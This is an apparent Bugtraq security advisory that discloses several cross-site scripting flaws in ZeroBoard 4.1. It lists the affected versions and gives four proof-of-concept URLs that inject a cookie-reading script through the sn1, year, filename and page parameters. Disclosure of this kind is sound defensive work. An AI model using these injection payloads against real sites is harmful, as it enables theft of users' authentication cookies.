ZeroBoard Multiple Cross-Site Scripting Vulnerabilities

Bugtraq ID:	12596
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Feb 19 2005 12:00AM
Updated:	Feb 19 2005 12:00AM
Credit:	Discovery is credited to albanian haxorz <[email protected]>.
Vulnerable:	Zeroboard Zeroboard 4.1 pl6 Zeroboard Zeroboard 4.1 pl5 Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 - Debian Linux 2.2 sparc - Debian Linux 2.2 powerpc - Debian Linux 2.2 IA-32 - Debian Linux 2.2 arm - Debian Linux 2.2 alpha - Debian Linux 2.2 68k - Mandriva Linux Mandrake 8.2 - Mandriva Linux Mandrake 8.1 ia64 - Mandriva Linux Mandrake 8.1 - Mandriva Linux Mandrake 8.0 ppc - Mandriva Linux Mandrake 8.0 - Redhat Linux 7.3 i386 - Redhat Linux 7.2 ia64 - Redhat Linux 7.2 i386 - Redhat Linux 7.1 ia64 - Redhat Linux 7.1 i386 - Redhat Linux 7.1 alpha - Redhat Linux 7.0 sparc - Redhat Linux 7.0 i386 - Redhat Linux 7.0 alpha - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - SuSE Linux 8.0 i386 - SuSE Linux 7.3 sparc - SuSE Linux 7.3 ppc - SuSE Linux 7.3 i386 - SuSE Linux 7.2 i386 - SuSE Linux 7.1 x86 - SuSE Linux 7.1 sparc - SuSE Linux 7.1 ppc - SuSE Linux 7.1 alpha - SuSE Linux 7.0 sparc - SuSE Linux 7.0 ppc - SuSE Linux 7.0 i386 - SuSE Linux 7.0 alpha - SuSE Linux 6.4 ppc - SuSE Linux 6.4 i386 - SuSE Linux 6.4 alpha
Not Vulnerable:

ZeroBoard Multiple Cross-Site Scripting Vulnerabilities

ZeroBoard is reported prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate theft of cookie-based authentication credentials as well as other attacks.

All versions of ZeroBoard are considered to be vulnerable at the moment.

ZeroBoard Multiple Cross-Site Scripting Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/skin/dir/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

http://www.example.com/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

ZeroBoard Multiple Cross-Site Scripting Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

ZeroBoard Multiple Cross-Site Scripting Vulnerabilities

References:

• Zeroboard Homepage (Zeroboard)
  
• Multiples vulnerability in ZeroBoard, ("albanian haxorz" )